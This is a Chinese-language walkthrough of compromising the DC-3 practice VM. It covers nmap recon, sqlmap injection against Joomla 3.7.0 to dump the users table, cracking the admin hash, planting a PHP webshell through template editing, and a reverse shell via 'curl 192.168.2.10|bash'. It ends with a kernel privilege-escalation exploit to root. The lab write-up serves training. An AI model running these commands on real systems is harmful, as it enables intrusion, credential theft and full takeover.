网络安全之渗透测试实战-DC-3-靶机入侵

news2024/11/15 1:46:22

一、下载靶机DC-3,解压后导入Vmware Workstation

https://pan.baidu.com/s/17BcSH6RqC7wuyB7PRNqOow?pwd=kc12

启动DC-3靶机,由于不知道密码,无需登录
在这里插入图片描述
二、靶机的网卡采用的是NAT模式自动获取IP地址,此时我们需要先获取其MAC地址。
在这里插入图片描述
三、因为DC-3与kali攻击机在同一个网段,在kali攻击机中利用nmap 获取本网段的主机信息,根据MAC地址比对来获取DC-3的IP地址。我的kali系统所在网段为192.168.2.0/24,利用如下命令获取本网段的主机信息

 nmap -sP 192.168.2.0/24 

在这里插入图片描述
根据扫描结果进行比对,可知DC-3靶机的IP地址为192.168.2.5

进一步利用nmap工具对靶机进行端口扫描,以此获取靶机开放的端口及提供的服务

nmap -A 192.168.2.5 -p 1-65535 -oN nmap.DC3

在这里插入图片描述
由图可知,靶机的80端口处于开放状态,尝试使用浏览器进行访问
在这里插入图片描述
四、利用whatweb工具对web进行指纹识别
Web指纹定义:Web指纹是一种对目标网站的识别技术,通过识别网站所使用的服务器、运行的脚本、安装的CMS等信息对目标进行精准的分类和定位。Web指纹识别可以帮助我们在安全测试中快速了解目标网站的基本信息,有助于搜索其相关漏洞。
在这里插入图片描述

 whatweb http://192.168.2.5

在这里插入图片描述
由图可知,该站点是一个Joomla站点,因此我们可以使用JoomScan 命令行工具识别 Joomla网站中的潜在安全漏洞。通过扫描 Joomla 系统组件、插件、模块等,检查是否存在已知的易受攻击的版本。

joomscan --url http://192.168.2.5

在这里插入图片描述
从图中可知,扫描出了网站的目录结构以及后台地址
用浏览器打开其后台地址
在这里插入图片描述
我们还可以知道网站使用的是Joomla 3.7.0版本的模板,因此我们查找一下网站模板Joomla 3.7.0存在哪些漏洞,便可加以利用
在这里插入图片描述
由此可知该网站存在sql注入的漏洞
将漏洞相关信息拷贝到当前目录

cp /usr/share/exploitdb/exploits/php/webapps/42033.txt joomalv370_sqli.txt
cat joomalv370_sqli.txt

在这里插入图片描述
五、有了以上信息后,我们便可利用SQLMAP工具进行注入,获取我们想要的信息
(1)列出数据库库名

sqlmap -u "http://192.168.2.5/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

在这里插入图片描述
(2)列出当前数据库库名

sqlmap -u "http://192.168.2.5/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --current-db -p list[fullordering]

在这里插入图片描述
由图可知当前的数据库名是joomladb
(3)列出joomladb数据库的表名

sqlmap -u "http://192.168.2.5/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]

在这里插入图片描述
(4)列出user表的字段及类型

sqlmap -u "http://192.168.2.5/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]

在这里插入图片描述
(5)列出账号密码

sqlmap -u "http://192.168.2.5/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump -p list[fullordering]

在这里插入图片描述
新建一个文档,并将获取到的密文密码放入其中,再利用解密工具解密
在这里插入图片描述
密码密文$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

vi joomlav370_admin_hash.txt

在这里插入图片描述
利用解密工具进行解密

john joomlav370_admin_hash.txt

在这里插入图片描述
获得密码明文为snoopy

此时,我们利用账号密码登录后台
在这里插入图片描述
在这里插入图片描述
仔细观察后发现该目录下有一个beez3的模板
在这里插入图片描述
进入之后,发现有目录,还可以编辑文件,因此可以考虑上传木马
在这里插入图片描述
要上传木马,我们先要找到当前文件所在的目录
在这里插入图片描述
新建一个yjh.php文件,并加入以下内容
在这里插入图片描述
然后对该页面进行访问,成功执行
在这里插入图片描述
使用中国蚁剑进行连接
在这里插入图片描述
在这里插入图片描述
六、反弹shell
首先了解下正向和反向链接
从一台hacker机器上直接链接被控机器,为正向链接;正向链接需要监听被控机器得端口开启情况,如果开启了端口,那么我就可以区连接被控得机器。
(1)在一台机器上被监听了端口,当被监测到端口开启后会发起向另外一台hacker机器远程链接得请求。
(2)但是目标主机处于内网环境是不可以被外网直接访问,只能主动将shell反弹出来.这种方式称作反弹shell,反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端,本质上是网络概念的客户端与服务端的角色反转。通常用于被控端因防火墙受限、权限不足、端口被占用等情形。
比如:
1.目标机器的ip动态改变,你不能持续控制。(只要对方的ip地址一换,权限就会丢失)
2.由于防火墙等限制,对方机器只能发送请求,不能接收请求。(攻击者发往目标机器的命令,被防火墙拦截无法执行,但目标机器在本地执行命令输出到攻击机器则不会受影响)
以上,这些情况下都没有办法使用常规的正向连接,让受害机器主动连接攻击机器,才是最佳的办法。
反弹shell是指控制端监听某个TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出传递到控制端的过程。
reverse shell与telnet、ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步。
常见的反弹shell的方法

利用netcat反弹shell
利用Bash反弹shell 
Curl配合Bash反弹shell
将反弹shell的命令写入定时任务
将反弹shell的命令写入/etc/profile文件
利用Socat反弹shell
利用Telnet反弹shell
各种脚本反弹shell
Python 脚本反弹shell
php 脚本反弹shell
Perl 脚本反弹shell
Ruby脚本反弹shell
使用Metasploit生成反弹shell用的一句话

这里我采用curl配合bash反弹shell
(1)首先在kali攻击机器上安装apache2,并在其目录下新建index.html文件

apt-get install apache2
cd /var/www/html

在这里插入图片描述
kali 端开启监听本地2333端口

nc -lvvp 2333

在这里插入图片描述
(2)靶机端输入如下命令

curl 192.168.2.10|bash

成功反弹shell
在这里插入图片描述
七、提权
前面可知道,靶机当前的系统为ubuntu 16.04
在这里插入图片描述
在这里插入图片描述
下载提权脚本后上传至靶机
在这里插入图片描述
在这里插入图片描述

<emplates/beez3/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh

在这里插入图片描述

<emplates/beez3/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput

在这里插入图片描述
在这里插入图片描述
提权成功,下期见

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2079108.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

黑神话悟空火到RD集体请假?文心快码助你速通游戏!

近期&#xff0c;一款名为《黑神话&#xff1a;悟空》的游戏席卷了朋友圈&#xff0c;以其独特的西游背景、引人入胜的剧情和极致的游戏体验&#xff0c;让众多玩家沉迷其中&#xff0c;欲罢不能。然而&#xff0c;这场“悟空风暴”也给我们的RD&#xff08;研究开发人员&#…

分贝通海外卡全新升级,引领企业全球支出管理新潮流

随着中国企业不断拓展海外市场,境外资金管理成为企业国际化进程中的一大挑战。面对复杂的国际金融环境和多变的汇率风险,企业迫切需要一个高效、安全、便捷的资金管理工具。 分贝通,全新升级海外卡,企业境外资金管理和安全保驾护航。 境外资金管理的痛点 1.汇率波动风险:国际…

Shell条件测试、if语句、case分支语句

目录 一、条件测试 1. 条件测试操作 2.test 命令 3.文件测试 4.字符串比较 5.逻辑测试 二、if语句 1.单分支结构 2. 双分支结构 3.多分支结构 三、case语句 1.case结构 一、条件测试 1. 条件测试操作 Shell环境根据命令执行后的返回状态值&#xff08;$?&#xff09;来…

C++学习笔记——求整数的和与均值

一、题目描述 二、代码 #include <iostream> #include<iomanip>using namespace std;int main() {int n;cin >> n;double a[n];for(int i0;i<n;i){cin >> a[i];}double num 0;for(int i0;i<n;i){num num a[i];}double result num / n;cout &…

dotpeek反编译dll导出代码

安装dotpeek github 官网 加载dll 导出 问题 去掉特性即可&#xff0c;安装mono.cecil using Mono.Cecil; using System;namespace DelSuppressIldasmAttribute {internal class Program{static void Main(string[] args){var input "xxxx.dll";var output &qu…

mybatis 八股文

目录 重点 mybatis如何防止sql注入 #和$的区别 mybatis一级缓存、二级缓存 为什么说 Mybatis 是半自动 ORM 映射工具&#xff1f;它与全自动的区别 基础 什么是MyBatis 谈谈你为什么用MyBatis&#xff0c;有什么优点 MyBatis有哪些缺点 如何获取自动生成的主键 属性名和…

linux 进程开机自启

linux 进程开机自启 在Linux系统中&#xff0c;要让一个进程在开机时自动启动&#xff0c;可以使用systemd服务。 以下是创建自启动服务的步骤和示例代码&#xff1a; 创建一个新的systemd服务单元文件。 文件通常位于/etc/systemd/system/目录下&#xff0c;以.service作为…

18年精诚合作!苏州金龙携Mowasalat成就卡塔尔中国客车第一品牌

8月25日&#xff0c; 卡塔尔国家运输公司Mowasalat&#xff08;以下简称“M公司”&#xff09;成立20周年暨与苏州金龙海格客车合作18周年庆典在卡塔尔首都多哈隆重召开。卡塔尔交通部部长贾西姆本赛义夫苏莱提&#xff0c;中国驻卡塔尔使馆经商处参赞杨松、M公司董事长萨阿德艾…

无人机之航拍的优势

无人机航拍在多个方面展现出了显著的优势&#xff0c;这些优势使其在航拍领域具有强大的竞争力和广泛的应用前景。以下是无人机航拍的主要优势&#xff1a; 一、 独特的视角与视觉震撼 独特视角&#xff1a;无人机航拍提供了与传统拍摄截然不同的视角&#xff0c;尤其是垂直正…

小米手机误删照片如何恢复?

在日常使用手机的过程中&#xff0c;我们难免会遇到误删照片的情况&#xff0c;尤其是在整理相册时一不小心就可能将珍贵的回忆永久删除。但别担心&#xff0c;小米手机提供了多种方法来帮助你恢复误删的照片。本文将为你详细介绍三种有效的恢复策略&#xff0c;帮助你找回那些…

【CSS in Depth 2 精译_021】3.4 负的外边距 + 3.5 外边距折叠

当前内容所在位置&#xff08;可进入专栏查看其他译好的章节内容&#xff09; 第一章 层叠、优先级与继承&#xff08;已完结&#xff09; 1.1 层叠1.2 继承1.3 特殊值1.4 简写属性1.5 CSS 渐进式增强技术1.6 本章小结 第二章 相对单位&#xff08;已完结&#xff09; 2.1 相对…

【思源笔记】思源笔记配置S3同步

本文首发于 ❄️慕雪的寒舍 文章目录 1. 写在前面2. 什么是思源笔记的S3/WEBDAV同步&#xff1f;2.1. 说明2.2. 思源的同步配置和工作空间2.3. 什么是S3协议&#xff1f; 3. 配置思源S3同步3.1. 初始化数据仓库密钥3.2. 思源S3同步界面3.3. 配置七牛云KODO3.4. 如何将同步配置导…

排队免单小程序

本文来自&#xff1a;排队免单小程序 - 源码1688 应用介绍 排队免单小程序是基于移动互联网技术开发的平台系统&#xff0c;通过小程序的形式为消费者和商家搭建了一个互动桥梁。以下是对排队免单小程序的详细介绍&#xff1a; 一、基本概念 排队免单小程序是一种创新的营销工…

Qt与SVG

Qt之SVG&#xff1a;Qt简单使用SVG的介绍_qt svg-CSDN博客 <?xml version"1.0" standalone"no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg xml…

15 种高级 RAG 技术 ——从预检索到生成

15 种高级 RAG 技术 ——从预检索到生成 检索增强生成&#xff08;RAG&#xff09;是一个丰富、快速发展的领域&#xff0c;它为增强由大型语言模型&#xff08;LLM&#xff09;驱动的生成式人工智能系统创造了新的机会。在本指南中&#xff0c;WillowTree的数据与人工智能研究…

工业一体机,为工业自动化提供完美解决方案

近年来&#xff0c;智能制造成为全球制造业转型升级的必然趋势&#xff0c;而工业自动化作为智能制造的关键环节&#xff0c;其重要性日益凸显。在这一趋势下&#xff0c;工业一体机凭借其高度集成、稳定可靠、灵活高效等优势&#xff0c;成为了工业自动化领域中不可或缺的“利…

Mysql的查询指令

整理了一些Mysql的查询语句&#xff0c;希望对大家有帮助&#xff0c;祝大家心想事成万事如意&#xff01; 基本查询 select 字段 from 表名 where 条件&#xff1b; 排序查询 select 字段 from 表名 order by 排序字段 [asc升序|desc降序] limit 前几行/中间几行&#xff1…

Nature methods | FlowSig--揭示细胞间流动网络新方法!有具体代码可实操!

–https://doi.org/10.1038/s41592-024-02380-w Inferring pattern-driving intercellular flows from single-cell and spatial transcriptomics FlowSig是刚刚&#xff08;8月26日&#xff09;发表在nature methods上的新文章&#xff0c;该方法系统性地推断出由细胞间通信…

Ubuntu系统使用Docker部署中文版trilium并实现远程编辑笔记

文章目录 前言1. 安装docker与docker-compose2. 启动容器运行镜像3. 本地访问测试4.安装内网穿透5. 创建公网地址6. 创建固定公网地址 前言 今天和大家分享一款在G站获得了26K的强大的开源在线协作笔记软件&#xff0c;Trilium Notes的中文版如何在Linux环境使用docker本地部署…

GPT微调和嵌入哪个好,大模型微调 和嵌入有什么区别?微调(fine-tuning),嵌入(embedding)的用法!

GPT擅长回答问题&#xff0c;但是只能回答它以前被训练过的问题&#xff0c;如果是没有训练过的数据&#xff0c;比如一些私有数据或者最新的数据该怎么办呢&#xff1f; 这种情况下通常有两种办法&#xff0c;一种是微调&#xff08;fine-tuning&#xff09;&#xff0c;一种…